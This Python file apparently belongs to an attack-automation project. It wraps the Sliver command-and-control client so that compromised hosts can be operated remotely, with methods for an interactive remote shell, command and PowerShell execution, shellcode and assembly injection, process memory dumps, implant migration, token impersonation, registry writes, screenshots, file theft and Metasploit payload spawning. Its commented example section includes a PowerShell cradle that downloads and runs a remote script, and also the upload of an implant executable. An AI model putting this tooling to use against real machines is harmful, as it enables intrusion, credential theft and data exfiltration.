#!/usr/bin/python3

import os
import re
import asyncio
import base64
from sliver import SliverClientConfig, SliverClient
from datetime import datetime
from sliver.protobuf import client_pb2, common_pb2, sliver_pb2
from rich.console import Console
from rich.panel import Panel

console = Console()


class SliverExecutor:
    def __init__(self, config_path=None, config=None):
        """
        It sets up the initial state by assigning values to instance attributes.
        """
        if config:
            self.config_path = config["sliver"]["client_config_file"]
        else:
            self.config_path = config_path

        self.config = SliverClientConfig.parse_config_file(self.config_path)
        self.client = SliverClient(self.config)
        self.output_dir = "/home/kali/Downloads"
        self.timestamp = datetime.now().strftime("%Y%m%d%H%M%S")

    # str-bool
    def _str_to_bool(self, value):
        if isinstance(value, bool):
            return value

        str_val = str(value).strip().lower()
        if str_val in ("true", "1", "yes", "y", "t", "on"):
            return True
        if str_val in ("false", "0", "no", "n", "f", "off", "none", "null"):
            return False

        if re.match(
            r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$", str_val
        ):
            return False

        raise ValueError(f"fault bool value: {value}")

    async def print_sessions(self):
        """Async client connect example"""
        await self.client.connect()
        sessions = await self.client.sessions()
        print("Sessions: %r" % sessions)

    async def select_sessions(self):
        """Async client connect example"""
        await self.client.connect()
        sessions = await self.client.sessions()
        if not sessions:
            print("No active sessions found.")
            return None

        print("Available Sessions:")
        for idx, session in enumerate(sessions):
            print(
                f"[{idx}] {session.ID} - {session.Name}@{session.Hostname} - {session.Username}({session.OS})"
            )

        while True:
            try:
                choice = input("Select session number: ")
                selected_idx = int(choice)
                if 0 <= selected_idx < len(sessions):
                    selected_session = sessions[selected_idx]
                    return selected_session.ID
                else:
                    print("Invalid selection. Please try again.")
            except ValueError:
                print("Invalid input. Please enter a number.")

    async def ls(self, session_id):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        ls = await session.ls()  # <-- Returns an Ls Protobuf object
        print("Listing directory contents of: %s" % ls.Path)
        for fi in ls.Files:
            print("FileName: %s (dir: %s, size: %d)" % (fi.Name, fi.IsDir, fi.Size))

    async def whoami(self, session_id):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        exec_result = await session.execute("whoami", [], True)
        print("Exec %r" % exec_result)

    async def get_session_by_id(self, session_id):
        """
        Helper function to get the full session object from its ID.
        """
        await self.client.connect()
        sessions = await self.client.sessions()
        for s in sessions:
            if s.ID == session_id:
                return s
        return None

    async def cmd(self, session_id, input_commands):
        try:
            await self.client.connect()
            interactive_session = await self.client.interact_session(session_id)
            session = await self.get_session_by_id(session_id)
            if not session:
                print(f"Error: Session with ID '{session_id}' not found.")
                return None

            target_os = session.OS.lower()
            print(f"[*] Target session OS is: {target_os}")

            if "windows" in target_os:
                executable = "cmd.exe"
                arg_prefix = "/c"
            elif "linux" in target_os or "darwin" in target_os:
                executable = "/bin/sh"
                arg_prefix = "-c"
            else:
                print(f"Unsupported OS for generic command execution: {session.OS}")
                return None

            command_list = [
                cmd.strip() for cmd in input_commands.splitlines() if cmd.strip()
            ]

            results = []
            for command in command_list:
                print(f"Executing with {executable}: {command}")

                exec_result = await interactive_session.execute(
                    executable, [arg_prefix, command], True
                )
                results.append(exec_result)

                if not exec_result:
                    print("Command execution did not return a result.")
                    continue
                if exec_result.Stderr and not exec_result.Stdout:
                    is_successful = False
                else:
                    is_successful = True

            return results

        except Exception as e:
            import traceback

            print(f"An unexpected error occurred: {e}")
            traceback.print_exc()
            return {"error": str(e)}

    async def shell(self, session_id: str):
        await self.client.connect()
        session = await self.get_session_by_id(session_id)
        if not session:
            console.print(
                f"[bold red]Error: Session with ID '{session_id}' not found.[/bold red]"
            )
            return

        interactive_session = await self.client.interact_session(session_id)
        target_os = session.OS.lower()

        if "windows" in target_os:
            executable = "cmd.exe"
            arg_prefix = "/c"
        else:  # linux, macos
            executable = "/bin/sh"
            arg_prefix = "-c"

        console.print(
            Panel(
                f"[bold yellow]Entering interactive shell for session {session_id} ({session.OS}).[/]\nType '[bold red]exit[/]' or '[bold red]quit[/]' to leave.",
                title="[bold green]Interactive Shell[/]",
            )
        )

        while True:
            try:
                command = console.input(
                    "[bold bright_blue]sliver-shell ➤ [/bold bright_blue]"
                )
                if command.strip().lower() in ["exit", "quit"]:
                    console.print("[yellow]Exiting interactive shell.[/yellow]")
                    break
                if not command.strip():
                    continue

                exec_result = await interactive_session.execute(
                    executable, [arg_prefix, command], True
                )

                if exec_result.Stdout:
                    console.print(
                        exec_result.Stdout.decode("utf-8", errors="ignore").strip()
                    )
                if exec_result.Stderr:
                    console.print(
                        f"[bold red]{exec_result.Stderr.decode('utf-8', errors='ignore').strip()}[/bold red]"
                    )

            except KeyboardInterrupt:
                console.print(
                    "\n[yellow]Exiting interactive shell due to keyboard interrupt.[/yellow]"
                )
                break
            except Exception as e:
                console.print(
                    f"[bold red]An error occurred in the shell: {e}[/bold red]"
                )

    async def powershell(self, session_id, input_commands):
        """
        Execute one or more PowerShell commands in the specified session.

        :param session_id: The ID of the active Sliver session.
        :param commands: A string containing one or more PowerShell commands (can be multi-line).
        :return: A list of results for each command executed.
        """
        try:
            # Connect to the Sliver server
            await self.client.connect()

            # Create an interactive session
            session = await self.client.interact_session(session_id)

            # Split the input commands into individual lines
            command_list = [
                cmd.strip() for cmd in input_commands.splitlines() if cmd.strip()
            ]

            # Initialize a list to store results
            results = []

            # Execute each command and collect the output
            for command in command_list:
                print(f"Executing: {command}")
                exec_result = await session.execute(
                    "powershell.exe", ["-Command", command], True
                )
                results.append(exec_result)
                print(f"Output:\n{exec_result}\n")

            return results

        except Exception as e:
            print(f"An error occurred: {e}")
            return None

    async def msf(self, session_id, payload, lhost, lport):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        await session.msf(payload, lhost, lport, "", 1)

    async def call_extension(self, session_id, name, export, ext_args):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        call_extension = await session.call_extension(name, export, ext_args)
        print("Calling extension: %s, export: %s" % (name, export))
        print("Extension Response: %s" % call_extension)

    async def cd(self, session_id, remote_path):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        pwd = await session.cd(remote_path)  # <-- Returns a pwd protobuf object
        print("Changed working directory to: %s" % remote_path)
        print("Current directory: %s" % pwd.Path)

    async def download(self, session_id, remote_path, recurse=False):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        download = await session.download(remote_path, recurse)
        filename = os.path.basename(remote_path)
        output_path = os.path.join(self.output_dir, filename)
        with open(output_path, "wb") as f:
            f.write(download.Data)
            print(f"File saved to: {output_path}")

    async def execute(self, session_id, exe, args, output=True):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        execute_result = await session.execute(exe, args, output)
        print("execute_result: %r" % execute_result)

    async def execute_assembly(
        self,
        session_id,
        assembly,
        arguments,
        process,
        is_dll,
        arch,
        class_name,
        method,
        app_domain,
    ):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        execute_assembly_result = await session.execute_assembly(
            assembly, arguments, process, is_dll, arch, class_name, method, app_domain
        )
        print("Execute Assembly result: %r" % execute_assembly_result)

    async def execute_shellcode(self, session_id, data, rwx, pid, encoder=""):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        task_result = await session.execute_shellcode(
            data, rwx, pid, encoder
        )  # <-- Returns a Task Protobuf object
        print("Shellcode execution result: %r" % task_result)

    async def get_env(self, session_id, name):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        env_info = await session.get_env(name)  # <-- Returns an EnvInfo Protobuf object
        print("Environment variable: %s" % (env_info))

    async def ifconfig(self, session_id):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        ifconfig = await session.ifconfig()
        print("Network Interface Configuration: %s" % ifconfig)

    async def impersonate(self, session_id, username):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        impersonate = await session.impersonate(username)
        print("Impersonate result: %s" % impersonate)

    async def list_extensions(self, session_id):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        listex = (
            await session.list_extensions()
        )  # <-- Returns a ListExtensions Protobuf object
        print("Listing extensions:")
        for ext in listex.Extensions:
            print("Extension: %s" % ext.Name)

    async def make_token(self, session_id, username, password, domain):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        MakeToken = await session.make_token(
            username, password, domain
        )  # <-- Returns a MakeToken Protobuf object
        print("Created token for user: %s" % username)
        print("Token: %r" % MakeToken)

    async def migrate(self, session_id, pid, config):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        Migrate = await session.migrate(
            pid, config
        )  # <-- Returns a Migrate Protobuf object
        print("Migrate implant to process ID: %d" % pid)
        print("Exec: %r" % Migrate)

    async def mkdir(self, remote_path, session_id):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        mkdir = await session.mkdir(remote_path)  # <-- Returns a Mkdir Protobuf object
        print("Make directory: %s" % mkdir)

    async def msf_remote(self, session_id, payload, lhost, lport, pid):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        await session.msf_remote(payload, lhost, lport, pid)

    async def netstat(
        self, tcp=None, udp=None, ipv4=None, ipv6=None, listening=True, session_id=None
    ):

        params = {
            "tcp": tcp,
            "udp": udp,
            "ipv4": ipv4,
            "ipv6": ipv6,
            "listening": listening,
        }

        for key in params:
            if params[key] is None:
                params[key] = False
            elif isinstance(params[key], str):
                params[key] = self._str_to_bool(params[key])

        session = await self.client.interact_session(session_id)
        try:
            netstat = await session.netstat(
                params["tcp"],
                params["udp"],
                params["ipv4"],
                params["ipv6"],
                params["listening"],
            )
        except AttributeError as e:
            raise RuntimeError(f"Session object missing required method: {e}") from e

        print("Network connections information:")
        for entry in netstat.Entries:
            print(f"{entry}")

    async def ping(self, session_id):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        ping = await session.ping()  # <-- Send ping and get a Ping Protobuf object
        print("Ping result: %r" % ping)

    async def process_dump(self, session_id, pid):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        ProcessDump = await session.process_dump(pid)
        print("Dump a remote process memory: %r" % ProcessDump)

    async def ps(self, session_id):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        processes = await session.ps()  # <-- List processes and get Ps Protobuf object

        print("Listing processes on the remote system:")
        for proc in processes:
            print("PID: %d, Executable: %s" % (proc.Pid, proc.Executable))

    async def pwd(self, session_id):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        pwd = await session.pwd()
        print("Current working directory: %s" % pwd.Path)

    async def register_extension(self, session_id, name, data, goos, init):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        register_extension = await session.register_extension(name, data, goos, init)
        print("Extension registered:: %s" % register_extension)

    async def registry_create_key(self, session_id, hive, reg_path, key, hostname):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        registry_create_key = await session.registry_create_key(
            hive, reg_path, key, hostname
        )
        print("Registry Key Created: %s" % registry_create_key)

    async def registry_read(self, session_id, hive, reg_path, key, hostname):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        RegistryRead = await session.registry_read(hive, reg_path, key, hostname)
        print("Registry Read Value: %s" % RegistryRead)

    async def registry_write(
        self,
        session_id,
        hive,
        reg_path,
        key,
        hostname,
        string_value,
        byte_value,
        dword_value,
        qword_value,
        reg_type,
    ):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        RegistryWrite = await session.registry_write(
            hive,
            reg_path,
            key,
            hostname,
            string_value,
            byte_value,
            dword_value,
            qword_value,
            reg_type,
        )
        print("Registry Write: %s" % RegistryWrite)

    async def revert_to_self(self, session_id):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        RevToSelf = await session.revert_to_self()
        print("Revert to self result: %s" % RevToSelf)

    async def rm(self, session_id, remote_path, recursive=False, force=False):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        rm = await session.rm(remote_path, recursive, force)
        print("Remove result for %s: %s" % (remote_path, rm))

    async def run_as(self, session_id, username, process_name, args):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        RunAs = await session.run_as(username, process_name, args)
        print("Run process as %s: %s" % (username, RunAs))

    async def screenshot(self, session_id):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        Screenshot = await session.screenshot()
        filename = f"screenshot_{self.timestamp}.png"
        output_path = os.path.join(self.output_dir, filename)
        with open(output_path, "wb") as f:
            f.write(Screenshot.Data)
            print(f"Screenshot saved to {output_path}")

    async def set_env(self, session_id, key, value):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        SetEnv = await session.set_env(key, value)
        print("Set: %s" % SetEnv)
        print("Environment variable set: %s=%s" % (key, value))

    async def sideload(
        self, session_id, data, process_name, arguments, entry_point, kill
    ):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        Sideload = await session.sideload(
            data, process_name, arguments, entry_point, kill
        )
        print("Sideload process: %s" % Sideload)

    async def spawn_dll(
        self, session_id, data, process_name, arguments, entry_point, kill
    ):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        SpawnDll = await session.spawn_dll(
            data, process_name, arguments, entry_point, kill
        )
        print("DLL spawn: %s" % SpawnDll)

    async def terminate(self, session_id, pid, force=False):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        Terminate = await session.terminate(pid, force)
        print("Terminate result: %s" % Terminate)

    async def unset_env(self, session_id, key):
        await self.client.connect()
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        UnSetEnv = await session.unset_env(key)
        print("Environment variable unset: %s" % UnSetEnv)

    async def upload(self, session_id, remote_path, data, is_ioc=False):
        await self.client.connect()
        if isinstance(data, str):
            try:
                with open(data, "rb") as f:
                    file_data = f.read()
                data = file_data
            except FileNotFoundError:
                print(f"[ERROR] File not found: {data}")
                return
            except PermissionError:
                print(f"[ERROR] Permission denied: {data}")
                return
            except Exception as e:
                print(f"[ERROR] Failed to read file: {str(e)}")
                return
        if isinstance(is_ioc, str):
            is_ioc = is_ioc.lower() == "true"
        session = await self.client.interact_session(
            session_id
        )  # <-- Create InteractiveSession object
        Upload = await session.upload(remote_path, data, is_ioc)
        print("Upload result: %s" % Upload)
        if Upload:
            print("Data uploaded to: %s" % remote_path)


async def main():
    sliver_exe = SliverExecutor(
        "/home/kali/Desktop/xiangmu/attack_executor-main/zer0cool.cfg"
    )
    # await sliver_exe.upload(
    #     session_id,
    #     "C:/Users/win/Desktop/sliver.exe",
    #     "/home/kali/Desktop/NATURAL_GARBAGE.exe",
    #     True,
    # )
    # commands = """
    #     iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')
    #     Invoke-Seatbelt -Command "-group=all"
    # """
    # Examples
    # await sliver_exe.print_sessions(session_id)
    # await sliver_exe.ls(session_id)
    # await sliver_exe.whoami(session_id)
    # await sliver_exe.cmd(session_id, commands)
    # await sliver_exe.print_sessions(session_id)
    # await sliver_exe.screenshot(session_id)
    # await sliver_exe.whoami(session_id)
    # await sliver_exe.powershell(session_id, commands=commands)
    # await sliver_exe.download(session_id,'C:\\Users\\Attacker\\Desktop\\test.txt')
    # await sliver_exe.cd(session_id, 'C:\\Users\\Attacker\\Desktop')
    # await sliver_exe.call_extension(session_id, 'ls', 'GetFiles','C:\\Users')
    # await sliver_exe.netstat(
    #     session_id=session_id,
    #     tcp=True,
    #     udp=False,
    #     ipv4=True,
    #     ipv6=False,
    #     listening=True,
    # )


if __name__ == "__main__":
    asyncio.run(main())
